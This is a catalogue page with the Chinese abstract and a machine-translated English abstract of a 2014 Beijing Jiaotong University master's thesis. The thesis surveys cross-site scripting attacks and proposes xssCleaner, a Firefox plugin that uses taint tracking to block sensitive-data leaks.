發(fā)布時間：2018-04-05 12:45

  本文選題：跨站腳本攻擊　切入點：瀏覽器安全　出處：《北京交通大學(xué)》2014年碩士論文

【摘要】：跨站腳本攻擊是當(dāng)今Web應(yīng)用領(lǐng)域危害最嚴(yán)重、最常見的威脅之一,該攻擊根源于Web應(yīng)用安全機(jī)制的薄弱環(huán)節(jié)：對用戶輸入缺乏足夠的過濾處理。雖然在服務(wù)器端修復(fù)Web應(yīng)用中的跨站腳本漏洞可以根本性解決該問題,但是由于安全補(bǔ)丁的更新速度慢,系統(tǒng)運(yùn)維人員的安全意識薄弱等各種原因,仍有很多Web應(yīng)用不能及時修復(fù)漏洞,從而導(dǎo)致用戶在使用這些應(yīng)用時處于遭受跨站攻擊的風(fēng)險下。因而為了提高用戶面對跨站腳本攻擊的主動防御能力,研究客戶端的跨站攻擊防御措施顯得很有必要。 論文的主要工作包括以下四個方面： 首先,論述了Web應(yīng)用的安全現(xiàn)狀,分析了客戶端現(xiàn)有的安全機(jī)制和承受的安全風(fēng)險,這些安全機(jī)制都是跨站腳本攻擊所要挑戰(zhàn)、克服的。 隨后,依據(jù)形成原因不同對跨站腳本攻擊進(jìn)行了分類,并分別歸納各種類型跨站腳本攻擊的特點�？偨Y(jié)了跨站腳本漏洞挖掘技巧,包括跨站腳本編碼方式以及防御策略繞過技巧。同時研究了跨站腳本在HTML界面中的觸發(fā)機(jī)制。 另外,搭建了一個虛擬的博客網(wǎng)站系統(tǒng),針對竊取cookie隱私、跨站腳本釣魚攻擊、跨站腳本蠕蟲攻擊等跨站攻擊方式,通過實例逐個演示了其具體攻擊過程并驗證其危害。簡單探討了鍵盤監(jiān)測、訪問本地剪貼板等其他攻擊方式。 最后,鑒于跨站腳本攻擊的主要目的是竊取用戶的敏感信息,其行為特征是未經(jīng)用戶的授權(quán)而將用戶的敏感信息發(fā)送給第三方,本文設(shè)計了全新的跨站攻擊防御方法,該方法在客戶端瀏覽器以動態(tài)污點追蹤為主,輔以靜態(tài)污點分析,通過污點追蹤對當(dāng)前頁面中的敏感信息傳輸進(jìn)行監(jiān)測,當(dāng)敏感信息有異常操作時向用戶發(fā)出警告,從而有效阻止客戶端敏感信息的泄露,實現(xiàn)對跨站攻擊的有效攔截。并通過對Javascript引擎Spidermonkey的擴(kuò)展,在開源的Firefox上實現(xiàn)了基于該方法的插件xssCleaner,驗證了防御方法的有效性和可行性。
[Abstract]:Cross-site scripting attack is one of the most serious and common threats in the field of Web application. This attack is rooted in the weak link of Web application security mechanism: lack of adequate filtering for user input.Although fixing the cross-site script vulnerability in Web application on the server side can solve this problem fundamentally, but because of the slow update speed of the security patch and the weak security consciousness of the system operator,There are still many Web applications that cannot fix vulnerabilities in time, resulting in users at risk of cross-site attacks when using these applications.Therefore, in order to improve the active defense ability of users against cross-site script attacks, it is necessary to study the defense measures of cross-site attacks on clients.The main work of the thesis includes the following four aspects:Firstly, this paper discusses the current security situation of Web application, analyzes the existing security mechanism and the security risk of the client. These security mechanisms are all challenges and overcome by the cross-station script attack.Then, the cross-site script attacks are classified according to the formation reasons, and the characteristics of various types of cross-site script attacks are summarized respectively.The techniques of exploiting cross-site script vulnerabilities are summarized, including cross-site script coding and defense strategy bypass techniques.At the same time, the trigger mechanism of cross-station script in HTML interface is studied.In addition, a virtual blog website system is built, aiming at stealing cookie privacy, cross-site script phishing attack, cross-site script worm attack and other cross-station attacks, the concrete attack process is demonstrated one by one through examples and its harm is verified.A simple discussion of keyboard monitoring, access to the local clipboard and other attacks.Finally, in view of the fact that the main purpose of cross-site script attack is to steal the sensitive information of the user, and its behavior characteristic is to send the sensitive information of the user to a third party without the authorization of the user, this paper designs a new cross-station attack defense method.The method is based on dynamic stain tracing in the client browser, supplemented by static stain analysis, monitors the transmission of sensitive information in the current page through stain tracing, and issues a warning to the user when the sensitive information has abnormal operation.In order to effectively prevent the client sensitive information leakage, the effective interception of cross-station attacks.Through the extension of Javascript engine Spidermonkey, the plug-in XSS Cleaner based on this method is implemented on the open source Firefox, which verifies the effectiveness and feasibility of the defense method.
【學(xué)位授予單位】：北京交通大學(xué)
【學(xué)位級別】：碩士
【學(xué)位授予年份】：2014
【分類號】：TP393.08

【引證文獻(xiàn)】

相關(guān)碩士學(xué)位論文 前1條

1 楊芮;Web用戶行為數(shù)據(jù)收集統(tǒng)計系統(tǒng)的設(shè)計與實現(xiàn)[D];北京交通大學(xué);2015年

，

本文編號：1714772